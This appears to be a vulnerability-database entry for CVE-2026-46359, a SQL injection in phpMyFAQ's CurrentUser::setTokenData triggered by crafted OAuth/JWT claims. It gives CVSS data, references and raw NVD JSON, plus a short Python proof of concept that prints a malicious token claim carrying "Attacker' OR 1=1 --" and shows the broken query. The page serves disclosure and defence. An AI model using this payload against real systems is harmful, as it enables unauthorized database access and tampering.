CVE-2026-46359

Description

phpMyFAQ before 4.1.2 contains a sql injection vulnerability in CurrentUser::setTokenData that allows authenticated attackers to execute arbitrary SQL by injecting malicious OAuth token claims. Attackers with Azure AD accounts containing SQL metacharacters in display names or JWT claims can break out of string literals and execute arbitrary database queries.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

phpMyFAQ < 4.1.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import jwt import json # Proof of Concept for CVE-2026-46359 # This script demonstrates the creation of a malicious JWT token claim. # An attacker would register an Azure AD account with a display name # containing SQL injection payloads. # The payload attempts to bypass the string literal in the SQL query # Example: UPDATE users SET display_name = '<PAYLOAD>' ... # Malicious payload to break out and comment out the rest sql_injection_payload = "Attacker' OR 1=1 --" # Simulated JWT payload structure that would come from the OAuth provider malicious_token_payload = { "sub": "001", "unique_name": sql_injection_payload, "email": "[email protected]", "ver": "2.0" } print("Malicious JWT Claim Payload:") print(json.dumps(malicious_token_payload, indent=2)) # When phpMyFAQ < 4.1.2 processes this token in CurrentUser::setTokenData, # it may construct a query like: # INSERT INTO user_data (display_name) VALUES ('Attacker' OR 1=1 --') # This results in arbitrary SQL execution.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-46359
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-46359
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-46359/
[4] VulDB https://vuldb.com/cve/CVE-2026-46359
[5] https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-pm8c-3qq3-72w7
[6] https://www.vulncheck.com/advisories/phpmyfaq-sql-injection-in-currentuser-settokendata-via-unescaped-oauth-token-fields
[7] https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-pm8c-3qq3-72w7

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-46359", "sourceIdentifier": "[email protected]", "published": "2026-05-15T19:17:03.120", "lastModified": "2026-05-15T22:16:56.433", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "phpMyFAQ before 4.1.2 contains a sql injection vulnerability in CurrentUser::setTokenData that allows authenticated attackers to execute arbitrary SQL by injecting malicious OAuth token claims. Attackers with Azure AD accounts containing SQL metacharacters in display names or JWT claims can break out of string literals and execute arbitrary database queries."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-pm8c-3qq3-72w7", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/phpmyfaq-sql-injection-in-currentuser-settokendata-via-unescaped-oauth-token-fields", "source": "[email protected]"}, {"url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-pm8c-3qq3-72w7", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}